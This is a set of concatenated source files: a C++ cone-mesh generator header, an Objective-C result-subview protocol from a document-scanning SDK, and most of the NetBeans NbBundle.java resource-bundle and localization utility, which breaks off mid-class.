<filename>engine/runtime/rendering/generator/cone_mesh.hpp #ifndef GENERATOR_CONEMESH_HPP #define GENERATOR_CONEMESH_HPP #include "axis_swap_mesh.hpp" #include "lathe_mesh.hpp" #include "line_shape.hpp" #include "uv_flip_mesh.hpp" namespace generator { /// A cone centered at origin tip pointing towards z-axis. /// @image html ConeMesh.svg class cone_mesh_t { private: using impl_t = axis_swap_mesh_t<lathe_mesh_t<line_shape_t>>; impl_t axis_swap_mesh_; public: ///@param radius Radius of the negative z end on the xy-plane. ///@param size Half of the length of the cylinder along the z-axis. ///@param slices Number of subdivisions around the z-axis. ///@param segments Number subdivisions along the z-axis. ///@param start Counterclockwise angle around the z-axis relative to the x-axis. ///@param sweep Counterclockwise angle around the z-axis. cone_mesh_t(double radius = 1.0, double size = 1.0, int slices = 32, int segments = 8, double start = 0.0, double sweep = gml::radians(360.0)); using triangles_t = typename impl_t::triangles_t; triangles_t triangles() const noexcept { return axis_swap_mesh_.triangles(); } using vertices_t = typename impl_t::vertices_t; vertices_t vertices() const noexcept { return axis_swap_mesh_.vertices(); } }; } #endif
475
377
<reponame>MoathOthman/blinkid-ios // // MBResultSubview.h // MicroblinkDev // // Created by <NAME> on 02/05/2018. // #import "MBRecognizerResult.h" /** * Protocol for processing MBRecognizerResult. Subviews implementing this protocol process and draw result data on the screen (e.g. letting users know is scanning was successful) */ @protocol MBResultSubview <NSObject> /** * This method should be called when MBRecognizerResultState is obtained and reslt state need to be drawn/redrawn. */ - (void)scanningFinishedWithState:(MBRecognizerResultState)state; @end
179
988
<filename>platform/openide.util/src/org/openide/util/NbBundle.java /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.openide.util; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import java.lang.ref.Reference; import java.lang.ref.WeakReference; import java.net.URL; import java.nio.ByteBuffer; import java.nio.CharBuffer; import java.nio.charset.Charset; import java.nio.charset.CharsetDecoder; import java.nio.charset.CharsetEncoder; import java.nio.charset.CoderResult; import java.nio.charset.CodingErrorAction; import java.nio.charset.StandardCharsets; import java.util.ArrayList; import java.util.Collections; import java.util.Enumeration; import java.util.HashMap; import java.util.Iterator; import java.util.LinkedList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.MissingResourceException; import java.util.NoSuchElementException; import java.util.Properties; import java.util.ResourceBundle; import java.util.WeakHashMap; import java.util.jar.Attributes; import java.util.logging.Level; import java.util.logging.Logger; /** Convenience class permitting easy loading of localized resources of various sorts. * Extends the functionality of {@link ResourceBundle} to handle branding, and interacts * better with class loaders in a module system. * <p>Example usage: * <pre> * package com.mycom; * public class Foo { * public String getDisplayName() { * return {@link #getMessage(Class,String) NbBundle.getMessage}(Foo.class, "Foo.displayName"); * } * } * </pre> * will in German locale look for the key {@code Foo.displayName} in * {@code com/mycom/Bundle_de.properties} and then {@code com/mycom/Bundle.properties} (in that order). * Usually however it is easiest to use {@link org.openide.util.NbBundle.Messages}. */ public class NbBundle extends Object { private static final Logger LOG = Logger.getLogger(NbBundle.class.getName()); private static final boolean USE_DEBUG_LOADER = Boolean.getBoolean("org.openide.util.NbBundle.DEBUG"); // NOI18N private static String brandingToken = null; private static final UtfThenIsoCharset utfThenIsoCharset = new UtfThenIsoCharset(false); private static final UtfThenIsoCharset utfThenIsoCharsetOnlyUTF8 = new UtfThenIsoCharset(true); /** * Cache of URLs for localized files. * Keeps only weak references to the class loaders. * @see "#9275" */ static final Map<ClassLoader,Map<String,URL>> localizedFileCache = new WeakHashMap<ClassLoader,Map<String,URL>>(); /** * Cache of resource bundles. */ static final Map<ClassLoader,Map<String,Reference<ResourceBundle>>> bundleCache = new WeakHashMap<ClassLoader,Map<String,Reference<ResourceBundle>>>(); /** * Do not call. * @deprecated There is no reason to instantiate or subclass this class. * All methods in it are static. */ @Deprecated public NbBundle() { } /** Get the current branding token. * @return the branding, or <code>null</code> for none */ public static String getBranding() { return brandingToken; } /** Set the current branding token. * The permitted format, as a regular expression: * <pre>[a-z][a-z0-9]*(_[a-z][a-z0-9]*)*</pre> * <p class="nonnormative"> * This is normally only called by NetBeans startup code and unit tests. * Currently the branding may be specified by passing the <code>--branding</code> * command-line option to the launcher. * </p> * @param bt the new branding, or <code>null</code> to clear * @throws IllegalArgumentException if in an incorrect format */ public static void setBranding(String bt) throws IllegalArgumentException { if (bt != null && !bt.matches("[a-z][a-z0-9]*(_[a-z][a-z0-9]*)*")) { // NOI18N throw new IllegalArgumentException("Malformed branding token: " + bt); // NOI18N } brandingToken = bt; } /** * Get a localized and/or branded file in the default locale with the default class loader. * <p>Note that use of this call is similar to using the URL protocol <code>nbresloc</code> * (which may in fact be implemented using the fuller form of the method). * <p>The extension may be null, in which case no final dot will be appended. * If it is the empty string, the resource will end in a dot. * @param baseName base name of file, as dot-separated path (e.g. <code>some.dir.File</code>) * @param ext extension of file (or <code>null</code>) * @return URL of matching localized file * @throws MissingResourceException if not found * @deprecated Use the <code>nbresloc</code> URL protocol instead. This method does a poor * job of handling resources such as <samp>/some.dir/res.txt</samp> or * <samp>/some/res.txt.sample</samp>. */ @Deprecated public static synchronized URL getLocalizedFile(String baseName, String ext) throws MissingResourceException { return getLocalizedFile(baseName, ext, Locale.getDefault(), getLoader()); } /** * Get a localized and/or branded file with the default class loader. * @param baseName base name of file, as dot-separated path (e.g. <code>some.dir.File</code>) * @param ext extension of file (or <code>null</code>) * @param locale locale of file * @return URL of matching localized file * @throws MissingResourceException if not found * @deprecated Use the <code>nbresloc</code> URL protocol instead. This method does a poor * job of handling resources such as <samp>/some.dir/res.txt</samp> or * <samp>/some/res.txt.sample</samp>. */ @Deprecated public static synchronized URL getLocalizedFile(String baseName, String ext, Locale locale) throws MissingResourceException { return getLocalizedFile(baseName, ext, locale, getLoader()); } /** * Get a localized and/or branded file. * @param baseName base name of file, as dot-separated path (e.g. <code>some.dir.File</code>) * @param ext extension of file (or <code>null</code>) * @param locale locale of file * @param loader class loader to use * @return URL of matching localized file * @throws MissingResourceException if not found * @deprecated Use the <code>nbresloc</code> URL protocol instead. This method does a poor * job of handling resources such as <samp>/some.dir/res.txt</samp> or * <samp>/some/res.txt.sample</samp>. */ @Deprecated public static synchronized URL getLocalizedFile(String baseName, String ext, Locale locale, ClassLoader loader) throws MissingResourceException { // [PENDING] in the future, could maybe do something neat if // USE_DEBUG_LOADER and ext is "html" or "txt" etc... URL lookup = null; Iterator<String> it = new LocaleIterator(locale); List<String> cacheCandidates = new ArrayList<String>(10); String baseNameSlashes = baseName.replace('.', '/'); Map<String,URL> perLoaderCache = localizedFileCache.get(loader); if (perLoaderCache == null) { localizedFileCache.put(loader, perLoaderCache = new HashMap<String,URL>()); } // #31008: better use of domain cache priming. // [PENDING] remove this hack in case the domain cache is precomputed URL baseVariant; String path; if (ext != null) { path = baseNameSlashes + '.' + ext; } else { path = baseNameSlashes; } lookup = perLoaderCache.get(path); if (lookup == null) { baseVariant = loader.getResource(path); } else { // who cares? already in cache anyway baseVariant = null; } while (it.hasNext()) { String suffix = it.next(); if (ext != null) { path = baseNameSlashes + suffix + '.' + ext; } else { path = baseNameSlashes + suffix; } lookup = perLoaderCache.get(path); if (lookup != null) { break; } cacheCandidates.add(path); if (suffix.length() == 0) { lookup = baseVariant; } else { lookup = loader.getResource(path); } if (lookup != null) { break; } } if (lookup == null) { path = baseName.replace('.', '/'); if (ext != null) { path += ('.' + ext); } throw new MissingResourceException( "Cannot find localized resource " + path + " in " + loader, loader.toString(), path ); // NOI18N } else { // Note that this is not 100% accurate. If someone calls gLF on something // with a locale/branding combo such as _brand_ja, and the answer is found // as _ja, then a subsequent call with param _brand will find this _ja // version - since the localizing iterator does *not* have the property that // each subsequent item is more general than the previous. However, this // situation is very unlikely, so consider this close enough. it = cacheCandidates.iterator(); while (it.hasNext()) { perLoaderCache.put(it.next(), lookup); } return lookup; } } /** * Find a localized and/or branded value for a given key and locale. * Scans through a map to find * the most localized match possible. For example: * <p><code><PRE> * findLocalizedValue (hashTable, "keyName", new Locale ("cs_CZ")) * </PRE></code> * <p>This would return the first non-<code>null</code> value obtained from the following tests: * <UL> * <LI> <CODE>hashTable.get ("keyName_cs_CZ")</CODE> * <LI> <CODE>hashTable.get ("keyName_cs")</CODE> * <LI> <CODE>hashTable.get ("keyName")</CODE> * </UL> * * @param table mapping from localized strings to objects * @param key the key to look for * @param locale the locale to use * @return the localized object or <code>null</code> if no key matches */ public static <T> T getLocalizedValue(Map<String,T> table, String key, Locale locale) { for (String suffix : NbCollections.iterable(new LocaleIterator(locale))) { String physicalKey = key + suffix; T v = table.get(physicalKey); if (v != null) { // ok if (USE_DEBUG_LOADER && (v instanceof String)) { // Not read from a bundle, but still localized somehow: @SuppressWarnings("unchecked") T _v = (T) (((String) v) + " (?:" + physicalKey + ")"); // NOI18N; return _v; } else { return v; } } } return null; } /** * Find a localized and/or branded value for a given key in the default system locale. * * @param table mapping from localized strings to objects * @param key the key to look for * @return the localized object or <code>null</code> if no key matches * @see #getLocalizedValue(Map,String,Locale) */ public static <T> T getLocalizedValue(Map<String,T> table, String key) { return getLocalizedValue(table, key, Locale.getDefault()); } /** * Find a localized and/or branded value in a JAR manifest. * @param attr the manifest attributes * @param key the key to look for (case-insensitive) * @param locale the locale to use * @return the value if found, else <code>null</code> */ public static String getLocalizedValue(Attributes attr, Attributes.Name key, Locale locale) { return getLocalizedValue(attr2Map(attr), key.toString().toLowerCase(Locale.US), locale); } /** * Find a localized and/or branded value in a JAR manifest in the default system locale. * @param attr the manifest attributes * @param key the key to look for (case-insensitive) * @return the value if found, else <code>null</code> */ public static String getLocalizedValue(Attributes attr, Attributes.Name key) { // Yes, US locale is intentional! The attribute name may only be ASCII anyway. // It is necessary to lowercase it *as ASCII* as in Turkish 'I' does not go to 'i'! return getLocalizedValue(attr2Map(attr), key.toString().toLowerCase(Locale.US)); } /** Necessary because Attributes implements Map; however this is dangerous! * The keys are Attributes.Name's, not Strings. * Also manifest lookups should not be case-sensitive. * (Though the locale suffix still will be!) */ private static Map<String,String> attr2Map(Attributes attr) { return new AttributesMap(attr); } // ---- LOADING RESOURCE BUNDLES ---- /** * Get a resource bundle with the default class loader and locale/branding. * <strong>Caution:</strong> {@link #getBundle(Class)} is generally * safer when used from a module as this method relies on the module's * classloader to currently be part of the system classloader. NetBeans * does add enabled modules to this classloader, however calls to * this variant of the method made in <a href="@org-openide-modules@/org/openide/modules/ModuleInstall.html#validate()">ModuleInstall.validate</a>, * or made soon after a module is uninstalled (due to background threads) * could fail unexpectedly. * @param baseName bundle basename * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(String baseName) throws MissingResourceException { return getBundle(baseName, Locale.getDefault(), getLoader()); } /** Get a resource bundle in the same package as the provided class, * with the default locale/branding and the class' own classloader. * The usual style of invocation is {@link #getMessage(Class,String)} * or one of the other overloads taking message formats. * * @param clazz the class to take the package name from * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(Class<?> clazz) throws MissingResourceException { String name = findName(clazz); return getBundle(name, Locale.getDefault(), clazz.getClassLoader()); } /** Finds package name for given class */ private static String findName(Class<?> clazz) { String pref = clazz.getName(); int last = pref.lastIndexOf('.'); if (last >= 0) { pref = pref.substring(0, last + 1); return pref + "Bundle"; // NOI18N } else { // base package, search for bundle return "Bundle"; // NOI18N } } /** * Get a resource bundle with the default class loader and branding. * @param baseName bundle basename * @param locale the locale to use (but still uses {@link #getBranding default branding}) * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(String baseName, Locale locale) throws MissingResourceException { return getBundle(baseName, locale, getLoader()); } /** Get a resource bundle the hard way. * @param baseName bundle basename * @param locale the locale to use (but still uses {@link #getBranding default branding}) * @param loader the class loader to use * @return the resource bundle * @exception MissingResourceException if the bundle does not exist */ public static ResourceBundle getBundle(String baseName, Locale locale, ClassLoader loader) throws MissingResourceException { if (USE_DEBUG_LOADER) { loader = DebugLoader.get(loader); } // Could more simply use ResourceBundle.getBundle (plus some special logic // with MergedBundle to handle branding) instead of manually finding bundles. // However this code is faster and has some other desirable properties. // Cf. #13847. ResourceBundle b = getBundleFast(baseName, locale, loader); if (b != null) { return b; } else { MissingResourceException e = new MissingResourceException("No such bundle " + baseName, baseName, null); // NOI18N if (Lookup.getDefault().lookup(ClassLoader.class) == null) { Exceptions.attachMessage(e, "Class loader not yet initialized in lookup"); // NOI18N } else { Exceptions.attachMessage(e, "Offending classloader: " + loader); // NOI18N } throw e; } } /** * Get a resource bundle by name. * Like {@link ResourceBundle#getBundle(String,Locale,ClassLoader)} but faster, * and also understands branding. * First looks for <samp>.properties</samp>-based bundles, then <samp>.class</samp>-based. * @param name the base name of the bundle, e.g. <samp>org.netbeans.modules.foo.Bundle</samp> * @param locale the locale to use * @param loader a class loader to search in * @return a resource bundle (locale- and branding-merged), or null if not found */ private static ResourceBundle getBundleFast(String name, Locale locale, ClassLoader loader) { Map<String,Reference<ResourceBundle>> m; synchronized (bundleCache) { m = bundleCache.get(loader); if (m == null) { bundleCache.put(loader, m = new HashMap<String,Reference<ResourceBundle>>()); } } //A minor optimization to cut down on StringBuffer allocations - OptimizeIt //showed the commented out code below was a major source of them. This //just does the same thing with a char array - Tim String localeStr = locale.toString(); char[] k = new char[name.length() + ((brandingToken != null) ? brandingToken.length() : 1) + 2 + localeStr.length()]; name.getChars(0, name.length(), k, 0); k[name.length()] = '/'; //NOI18N int pos = name.length() + 1; if (brandingToken == null) { k[pos] = '-'; //NOI18N pos++; } else { brandingToken.getChars(0, brandingToken.length(), k, pos); pos += brandingToken.length(); } k[pos] = '/'; //NOI18N pos++; localeStr.getChars(0, localeStr.length(), k, pos); String key = new String(k); /* String key = name + '/' + (brandingToken != null ? brandingToken : "-") + '/' + locale; // NOI18N */ synchronized (m) { Reference<ResourceBundle> o = m.get(key); ResourceBundle b = o != null ? o.get() : null; if (b != null) { return b; } else { b = loadBundle(name, locale, loader); if (b != null) { m.put(key, new TimedSoftReference<ResourceBundle>(b, m, key)); } else { // Used to cache misses as well, to make the negative test faster. // However this caused problems: see #31578. } return b; } } } /** * Load a resource bundle (without caching). * @param name the base name of the bundle, e.g. <samp>org.netbeans.modules.foo.Bundle</samp> * @param locale the locale to use * @param loader a class loader to search in * @return a resource bundle (locale- and branding-merged), or null if not found */ private static ResourceBundle loadBundle(String name, Locale locale, ClassLoader loader) { String sname = name.replace('.', '/'); Iterator<String> it = new LocaleIterator(locale); LinkedList<String> l = new LinkedList<String>(); while (it.hasNext()) { l.addFirst(it.next()); } Properties p = new Properties(); for (String suffix : l) { String res = sname + suffix + ".properties"; // #49961: don't use getResourceAsStream; catch all errors opening it URL u = loader != null ? loader.getResource(res) : ClassLoader.getSystemResource(res); if (u != null) { //System.err.println("Loading " + res); try { // #51667: but in case we are in USE_DEBUG_LOADER mode, use gRAS (since getResource is not overridden) InputStream is = USE_DEBUG_LOADER ? (loader != null ? loader.getResourceAsStream(res) : ClassLoader.getSystemResourceAsStream(res)) : u.openStream(); // #NETBEANS-5181 String encoding = System.getProperty("java.util.PropertyResourceBundle.encoding"); UtfThenIsoCharset charset = "UTF-8".equals(encoding) ? utfThenIsoCharsetOnlyUTF8 : utfThenIsoCharset; InputStreamReader reader = new InputStreamReader(is, "ISO-8859-1".equals(encoding) ? StandardCharsets.ISO_8859_1.newDecoder() : charset.newDecoder()); try { p.load(reader); } finally { is.close(); } } catch (IOException e) { Exceptions.attachMessage(e, "While loading: " + res); // NOI18N LOG.log(Level.WARNING, null, e); return null; } } else if (suffix.length() == 0) { // No base *.properties. Try *.class. // Note that you may not mix *.properties w/ *.class this way. return loadBundleClass(name, sname, locale, l, loader); } } return new PBundle(NbCollections.checkedMapByFilter(p, String.class, String.class, true), locale); } /** * Load a class-based resource bundle. * @param name the base name of the bundle, e.g. <samp>org.netbeans.modules.foo.Bundle</samp> * @param sname the name with slashes, e.g. <samp>org/netbeans/modules/foo/Bundle</samp> * @param locale the locale to use * @param suffixes a list of suffixes to apply to the bundle name, in <em>increasing</em> order of specificity * @param loader a class loader to search in * @return a resource bundle (merged according to the suffixes), or null if not found */ private static ResourceBundle loadBundleClass( String name, String sname, Locale locale, List<String> suffixes, ClassLoader l ) { if (l != null && l.getResource(sname + ".class") == null) { // NOI18N // No chance - no base bundle. Don't waste time catching CNFE. return null; } ResourceBundle master = null; for (String suffix : suffixes) { try { Class<? extends ResourceBundle> c = Class.forName(name + suffix, true, l).asSubclass(ResourceBundle.class); ResourceBundle b = c.newInstance(); if (master == null) { master = b; } else { master = new MergedBundle(locale, b, master); } } catch (ClassNotFoundException cnfe) { // fine - ignore } catch (Exception e) { LOG.log(Level.WARNING, null, e); } catch (LinkageError e) { LOG.log(Level.WARNING, null, e); } } return master; } // // Helper methods to simplify localization of messages // /** * Finds a localized and/or branded string in a bundle. * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found */ public static String getMessage(Class<?> clazz, String resName) throws MissingResourceException { return getBundle(clazz).getString(resName); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object param1) throws MissingResourceException { return getMessage(clazz, resName, new Object[] { param1 }); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @param param2 the second argument to use for formatting * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object param1, Object param2) throws MissingResourceException { return getMessage(clazz, resName, new Object[] { param1, param2 }); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @param param2 the second argument to use for formatting * @param param3 the third argument to use for formatting * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object param1, Object param2, Object param3) throws MissingResourceException { return getMessage(clazz, resName, new Object[] { param1, param2, param3 }); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param param1 the argument to use when formatting the message * @param param2 the second argument to use for formatting * @param param3 the third argument to use for formatting * @param param4 the fourth argument to use for formatting * @param params fifth, sixth, ... arguments as needed * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) * @since org.openide.util 7.27 */ public static String getMessage(Class<?> clazz, String resName, Object param1, Object param2, Object param3, Object param4, Object... params) throws MissingResourceException { Object[] allParams = new Object[params.length + 4]; allParams[0] = param1; allParams[1] = param2; allParams[2] = param3; allParams[3] = param4; System.arraycopy(params, 0, allParams, 4, params.length); return getMessage(clazz, resName, allParams); } /** * Finds a localized and/or branded string in a bundle and formats the message * by passing requested parameters. * * @param clazz the class to use to locate the bundle (see {@link #getBundle(Class)} for details) * @param resName name of the resource to look for * @param arr array of parameters to use for formatting the message * @return the string associated with the resource * @throws MissingResourceException if either the bundle or the string cannot be found * @see java.text.MessageFormat#format(String,Object[]) */ public static String getMessage(Class<?> clazz, String resName, Object[] arr) throws MissingResourceException { return java.text.MessageFormat.format(getMessage(clazz, resName), arr); } /** @return default class loader which is used, when we don't have * any other class loader. (in function getBundle(String), getLocalizedFile(String), * and so on... */ private static ClassLoader getLoader() { ClassLoader c = Lookup.getDefault().lookup(ClassLoader.class); return (c != null) ? c : ClassLoader.getSystemClassLoader(); } /** * Get a list of all suffixes used to search for localized/branded resources. * Based on the default locale and branding, returns the list of suffixes * which various <code>NbBundle</code> methods use as the search order. * For example, when {@link #getBranding} returns <code>branding</code> * and the default locale is German, you might get a sequence such as: * <ol> * <li><samp>"_branding_de"</samp> * <li><samp>"_branding"</samp> * <li><samp>"_de"</samp> * <li><samp>""</samp> * </ol> * @return a read-only iterator of type <code>String</code> * @since 1.1.5 */ public static Iterator<String> getLocalizingSuffixes() { return new LocaleIterator(Locale.getDefault()); } /** * Do not use. * @param loaderFinder ignored * @deprecated Useless. */ @Deprecated public static void setClassLoaderFinder(ClassLoaderFinder loaderFinder) { throw new Error(); } /** * Creates a helper class with static definitions of bundle keys. * <p> * The generated class will be called {@code Bundle} and be in the same package. * Each key is placed in a {@code Bundle.properties} file also in the same package, * and the helper class gets a method with the same name as the key * (converted to a valid Java identifier as needed) * which loads the key from the (possibly now localized) bundle using {@link NbBundle#getMessage(Class, String)}. * The method will have as many arguments (of type {@code Object}) as there are message format parameters. * </p> * <p>It is an error to duplicate a key within a package, even if the duplicates are from different compilation units.</p> * <p>Example usage:</p> * <pre> * package some.where; * import org.openide.util.NbBundle.Messages; * import static some.where.Bundle.*; * import org.openide.DialogDisplayer; * import org.openide.NotifyDescriptor; * class Something { * &#64;Messages({ * "dialog.title=Bad File", * "# {0} - file path", * "dialog.message=The file {0} was invalid." * }) * void showError(File f) { * NotifyDescriptor d = new NotifyDescriptor.Message( * dialog_message(f), NotifyDescriptor.ERROR_MESSAGE); * d.setTitle(dialog_title()); * DialogDisplayer.getDefault().notify(d); * } * } * </pre> * <p>which generates during compilation {@code Bundle.java}:</p> * <pre> * class Bundle { * static String dialog_title() {...} * static String dialog_message(Object file_path) {...} * } * </pre> * <p>and {@code Bundle.properties}:</p> * <pre> * dialog.title=Bad File * # {0} - file path * dialog.message=The file {0} was invalid. * </pre> * @since org.openide.util 8.10 (available also on fields since 8.22) */ @Retention(RetentionPolicy.SOURCE) @Target({ElementType.PACKAGE, ElementType.TYPE, ElementType.METHOD, ElementType.CONSTRUCTOR, ElementType.FIELD}) public @interface Messages { /** * List of key/value pairs. * Each must be of the form {@code key=Some Value}. * Anything is permitted in the value, including newlines. * Unlike in a properties file, there should be no whitespace before the key or around the equals sign. * Values containing <code>{0}</code> etc. are assumed to be message formats and so may need escapes for metacharacters such as {@code '}. * A line may also be a comment if it starts with {@code #}, which may be useful for translators; * it is recommended to use the format {@code # {0} - summary of param}. */ String[] value(); } /** * Do not use. * @deprecated Useless. */ @Deprecated public static interface ClassLoaderFinder { /** * Do not use. * @return nothing * @deprecated Useless. */ @Deprecated public ClassLoader find(); } private static class AttributesMap extends HashMap<String,String> { private Attributes attrs; public AttributesMap(Attributes attrs) { super(7); this.attrs = attrs; } public @Override String get(Object _k) { if (!(_k instanceof String)) { return null; } String k = (String) _k; Attributes.Name an; try { an = new Attributes.Name(k); } catch (IllegalArgumentException iae) { // Robustness, and workaround for reported MRJ locale bug: LOG.log(Level.FINE, null, iae); return null; } return attrs.getValue(an); } } /** * A resource bundle based on <samp>.properties</samp> files (or any map). */ private static final class PBundle extends ResourceBundle { private final Map<String,String> m; private final Locale locale; /** * Create a new bundle based on a map. * @param m a map from resources keys to values (typically both strings) * @param locale the locale it represents <em>(informational)</em> */ public PBundle(Map<String,String> m, Locale locale) { this.m = m; this.locale = locale; } public @Override Enumeration<String> getKeys() { return Collections.enumeration(m.keySet()); } protected @Override Object handleGetObject(String key) { return m.get(key); } public @Override Locale getLocale() { return locale; } } /** Special resource bundle which delegates to two others. * Ideally could just set the parent on the first, but this is protected, so... */ private static class MergedBundle extends ResourceBundle { private Locale loc; private ResourceBundle sub1; private ResourceBundle sub2; /** * Create a new bundle delegating to two others. * @param loc the locale it represents <em>(informational)</em> * @param sub1 one delegate (taking precedence over the other in case of overlap) * @param sub2 the other (weaker) delegate */ public MergedBundle(Locale loc, ResourceBundle sub1, ResourceBundle sub2) { this.loc = loc; this.sub1 = sub1; this.sub2 = sub2; } public @Override Locale getLocale() { return loc; } public @Override Enumeration<String> getKeys() { return Enumerations.removeDuplicates(Enumerations.concat(sub1.getKeys(), sub2.getKeys())); } protected @Override Object handleGetObject(String key) throws MissingResourceException { try { return sub1.getObject(key); } catch (MissingResourceException mre) { // Ignore exception, and... return sub2.getObject(key); } } } /** This class (enumeration) gives all localized sufixes using nextElement * method. It goes through given Locale and continues through Locale.getDefault() * Example 1: * Locale.getDefault().toString() -> "_en_US" * you call new LocaleIterator(new Locale("cs", "CZ")); * ==> You will gets: "_cs_CZ", "_cs", "", "_en_US", "_en" * * Example 2: * Locale.getDefault().toString() -> "_cs_CZ" * you call new LocaleIterator(new Locale("cs", "CZ")); * ==> You will gets: "_cs_CZ", "_cs", "" * * If there is a branding token in effect, you will get it too as an extra * prefix, taking precedence, e.g. for the token "f4jce": * * "_f4jce_cs_CZ", "_f4jce_cs", "_f4jce", "_f4jce_en_US", "_f4jce_en", "_cs_CZ", "_cs", "", "_en_US", "_en" * * Branding tokens with underscores are broken apart naturally: so e.g. * branding "f4j_ce" looks first for "f4j_ce" branding, then "f4j" branding, then none. */ private static class LocaleIterator extends Object implements Iterator<String> { /** this flag means, if default locale is in progress */ private boolean defaultInProgress = false; /** this flag means, if empty suffix was exported yet */ private boolean empty = false; /** current locale, and initial locale */ private Locale locale; /** current locale, and initial locale */ private Locale initLocale; /** current suffix which will be returned in next calling nextElement */ private String current; /** the branding string in use */ private String branding; /** Creates new LocaleIterator for given locale. * @param locale given Locale */ public LocaleIterator(Locale locale) { this.locale = this.initLocale = locale; if (locale.equals(Locale.getDefault())) { defaultInProgress = true; } current = '_' + locale.toString(); if (brandingToken == null) { branding = null; } else { branding = "_" + brandingToken; // NOI18N } //System.err.println("Constructed: " + this); } /** @return next suffix. * @exception NoSuchElementException if there is no more locale suffix. */ public @Override String next() throws NoSuchElementException { if (current == null) { throw new NoSuchElementException(); } final String ret; if (branding == null) { ret = current; } else { ret = branding + current; } int lastUnderbar = current.lastIndexOf('_'); if (lastUnderbar == 0) { if (empty) { reset(); } else { current = ""; // NOI18N empty = true; } } else { if (lastUnderbar == -1) { if (defaultInProgress) { reset(); } else { // [PENDING] stuff with trying the default locale // after the real one does not actually seem to work... locale = Locale.getDefault(); current = '_' + locale.toString(); defaultInProgress = true; } } else { current = current.substring(0, lastUnderbar); } } //System.err.println("Returning: `" + ret + "' from: " + this); return ret; } /** Finish a series. * If there was a branding prefix, restart without that prefix * (or with a shorter prefix); else finish. */ private void reset() { if (branding != null) { current = '_' + initLocale.toString(); int idx = branding.lastIndexOf('_'); if (idx == 0) { branding = null; } else { branding = branding.substring(0, idx); } empty = false; } else { current = null; } } /** Tests if there is any sufix.*/ public @Override boolean hasNext() { return (current != null); } public @Override void remove() throws UnsupportedOperationException { throw new UnsupportedOperationException(); } } // end of LocaleIterator /** Classloader whose special trick is inserting debug information * into any *.properties files it loads. */ static final class DebugLoader extends ClassLoader { /** global bundle index, each loaded bundle gets its own */ private static int count = 0; /** indices of known bundles; needed since DebugLoader's can be collected * when softly reachable, but this should be transparent to the user */ private static final Map<String,Integer> knownIDs = new HashMap<String,Integer>(); /** cache of existing debug loaders for regular loaders */ private static final Map<ClassLoader,Reference<ClassLoader>> existing = new WeakHashMap<ClassLoader,Reference<ClassLoader>>(); private DebugLoader(ClassLoader cl) { super(cl); //System.err.println ("new DebugLoader: cl=" + cl); } private static int getID(String name) { synchronized (knownIDs) { Integer i = knownIDs.get(name); if (i == null) { i = ++count; knownIDs.put(name, i); System.err.println("NbBundle trace: #" + i + " = " + name); // NOI18N } return i; } } public static ClassLoader get(ClassLoader normal) { //System.err.println("Lookup: normal=" + normal); synchronized (existing) { Reference<ClassLoader> r = existing.get(normal); if (r != null) { ClassLoader dl = r.get(); if (dl != null) { //System.err.println("\tcache hit"); return dl; } else { //System.err.println("\tcollected ref"); } } else { //System.err.println("\tnot in cache"); } ClassLoader dl = new DebugLoader(normal); existing.put(normal, new WeakReference<ClassLoader>(dl)); return dl; } } public @Override InputStream getResourceAsStream(String name) { InputStream base = super.getResourceAsStream(name); if (base == null) { return null; } if (name.endsWith(".properties")) { // NOI18N int id = getID(name); //System.err.println ("\tthis=" + this + " parent=" + getParent ()); boolean loc = name.indexOf("Bundle") != -1; // NOI18N return new DebugInputStream(base, id, loc); } else { return base; } } // [PENDING] getResource not overridden; but ResourceBundle uses getResourceAsStream anyhow /** Wrapper input stream which parses the text as it goes and adds annotations. * Resource-bundle values are annotated with their current line number and also * the supplied it, so e.g. if in the original input stream on line 50 we have: * somekey=somevalue * so in the wrapper stream (id 123) this line will read: * somekey=somevalue (123:50) * Since you see on stderr what #123 is, you can then pinpoint where any bundle key * originally came from, assuming NbBundle loaded it from a *.properties file. * @see {@link Properties#load} for details on the syntax of *.properties files. */ static final class DebugInputStream extends InputStream { /** state transition diagram constants */ private static final int WAITING_FOR_KEY = 0; /** state transition diagram constants */ private static final int IN_COMMENT = 1; /** state transition diagram constants */ private static final int IN_KEY = 2; 